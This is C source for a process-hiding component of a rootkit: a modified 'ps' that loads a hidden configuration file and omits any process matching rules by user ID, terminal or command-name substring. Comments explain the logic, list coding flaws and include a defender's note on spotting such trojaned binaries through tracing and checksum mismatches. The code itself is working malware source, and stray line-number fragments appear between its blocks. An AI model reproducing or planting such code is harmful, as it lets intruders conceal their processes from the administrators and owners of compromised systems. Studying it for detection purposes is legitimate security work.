
/*
 * Tunables and rule codes for the hide list that this modified ps consults
 * (see check_process below). Each configuration line carries one of the
 * BY_* codes followed by the value the rule compares against.
 */
#define STR_SIZE    128                 /* capacity of tmp_str and h_st.hack_cmd */
#define SEP_CHAR    " \n"               /* strtok separators used on config lines */
#define SHOWFLAG    /*  Able to list processes with 'ps -/' command  */   /* defined here, not referenced on this page */
#define BY_USER        0                /* hack_cmd holds a numeric uid, parsed with atoi */
#define BY_TTY        1                /* hack_cmd holds a tty name without its "tty"/"cua" prefix */
#define BY_NAME        2                /* hack_cmd is matched as a substring of p_comm */
  7.  
/*
 * One hide rule. The list built by process_block_list always ends with a
 * trailing node whose next is NULL; that node carries no rule and is the
 * stop condition for the walk in check_process (node->next == NULL).
 */
struct h_st {
    struct h_st *next;                 /* following rule; NULL on the trailing node */
    int hack_type;                     /* one of BY_USER / BY_TTY / BY_NAME */
    char hack_cmd[STR_SIZE];           /* rule operand, copied verbatim from the config line */
};
  13.  
/*
 * Module-wide state. Everything is a plain global with no locking, and
 * check_process walks the list through the shared cursor h_tmp, so neither
 * function is reentrant.
 */
struct h_st *hack_list;                /* head of the hide-rule list built by process_block_list */
struct h_st *h_tmp;                    /* scratch cursor shared by both functions */

char tmp_str[STR_SIZE];                /* fgets line buffer for the config file */
char *strp;                            /* current strtok token */

FILE *fp_hack;                         /* config file handle; opened in process_block_list, never closed here */

int show_all=0;                        /* presumably set by the SHOWFLAG option to bypass hiding — not referenced on this page */
  23.  
/*
 * Build hack_list from the hide-rule configuration file.
 *
 * The file name is the first nine characters of ROOTKIT_HIDE_PROCESSES
 * (defined elsewhere; not visible on this page), so a longer path is
 * silently truncated. Each line is "<type> <value>" split on SEP_CHAR:
 * <type> goes through atoi into hack_type, <value> is copied into hack_cmd.
 * A trailing node with next == NULL is always left at the end as the list
 * terminator; when fopen fails that node is the only one, i.e. no rules.
 *
 * Defender's note: a ps binary that opens an extra configuration file on
 * every invocation shows up in a ktrace/truss of the command, and the
 * binary itself no longer matches the checksum the distribution ships for
 * ps — both are cheap integrity checks for this kind of trojaned tool.
 *
 * Reviewer's note on the original code, left as-is: the return type is an
 * implicit int (pre-C99) and nothing is returned; malloc results are never
 * checked; a line with only one token makes the second strtok return NULL,
 * which is then passed to strcpy; and fp_hack is never closed.
 */
inline process_block_list()
{
    char PSCONF[10];

    /* Copy the first nine bytes of the macro; anything beyond is dropped. */
    PSCONF[0]=ROOTKIT_HIDE_PROCESSES[0];
    PSCONF[1]=ROOTKIT_HIDE_PROCESSES[1];
    PSCONF[2]=ROOTKIT_HIDE_PROCESSES[2];
    PSCONF[3]=ROOTKIT_HIDE_PROCESSES[3];
    PSCONF[4]=ROOTKIT_HIDE_PROCESSES[4];
    PSCONF[5]=ROOTKIT_HIDE_PROCESSES[5];
    PSCONF[6]=ROOTKIT_HIDE_PROCESSES[6];
    PSCONF[7]=ROOTKIT_HIDE_PROCESSES[7];
    PSCONF[8]=ROOTKIT_HIDE_PROCESSES[8];
    PSCONF[9]='\0';                    /* always terminated, whatever the macro's length */

    h_tmp=(struct h_st *)malloc(sizeof(struct h_st));   /* head node; allocation unchecked */
    hack_list=h_tmp;

    if(fp_hack=fopen(PSCONF,"r")) {
        while(fgets(tmp_str, 126, fp_hack)) {          /* at most 125 chars per line; tmp_str holds STR_SIZE */
            h_tmp->next=(struct h_st *)malloc(sizeof(struct h_st));   /* next node, allocated one line ahead; unchecked */
            strp=(char *)strtok(tmp_str, SEP_CHAR);     /* first token: rule type */
            h_tmp->hack_type=atoi(strp);
            strp=(char *)strtok('\0', SEP_CHAR);        /* '\0' is the integer 0 here, i.e. a null pointer: continue in tmp_str */
            strcpy(h_tmp->hack_cmd, strp);              /* strp is NULL when the line had no second token */
            h_tmp=h_tmp->next;
        }
    }

    h_tmp->next=NULL;                  /* terminate the list at the unused trailing node */
}
  55.  
/*
 * Return 1 if the process described by kip matches any rule in hack_list,
 * otherwise 0. Walks the list through the global cursor h_tmp and stops at
 * the trailing node (node->next == NULL), which carries no rule.
 *
 * Rule kinds:
 *   BY_USER  uid equality against atoi(hack_cmd); which uid field is read
 *            depends on the NEWVM build flag.
 *   BY_TTY   name of the controlling tty (devname on kp_eproc.e_tdev) with
 *            a leading "tty" or "cua" stripped, compared with strcmp. A
 *            process with no tty (NODEV) or an unresolvable device never
 *            matches.
 *   BY_NAME  substring match of hack_cmd in p_comm via strstr, so a short
 *            operand also matches every longer command name containing it.
 * Any other hack_type falls through the switch (no default) and is ignored.
 *
 * The caller is presumably the process-listing loop of ps, which skips an
 * entry when this returns 1 — that part is not on this page. hack_list is
 * dereferenced without a NULL check, so process_block_list must run first.
 */
inline int check_process(struct kinfo_proc *kip)
{
    int block=0;
    dev_t dev;
    char *ttname;

    for(h_tmp=hack_list; h_tmp->next; h_tmp=h_tmp->next) {   /* stop before the trailing node */
        switch(h_tmp->hack_type) {
            case BY_USER:
#ifndef NEWVM
                if(kip->kp_proc.p_uid==atoi(h_tmp->hack_cmd))
#else
                if(kip->kp_eproc.e_ucred.cr_uid==atoi(h_tmp->hack_cmd))
#endif
                    block=1;
                break;
                        case BY_TTY:
                dev=kip->kp_eproc.e_tdev;
                if(dev==NODEV||!(ttname=devname(dev,S_IFCHR)))
                    break;             /* no controlling tty, or no name for it: rule cannot match */
                else {
                    if(!strncmp(ttname,"tty",3)||!strncmp(ttname,"cua",3))
                        ttname+=3;     /* compare only the part after the "tty"/"cua" prefix */
                    if(!strcmp(ttname,h_tmp->hack_cmd))
                        block=1;
                }
                break;
            case BY_NAME:
                if(strstr(kip->kp_proc.p_comm,h_tmp->hack_cmd))   /* substring, not whole-name, match */
                    block=1;
                                break;
            }
    }

    return(block);
}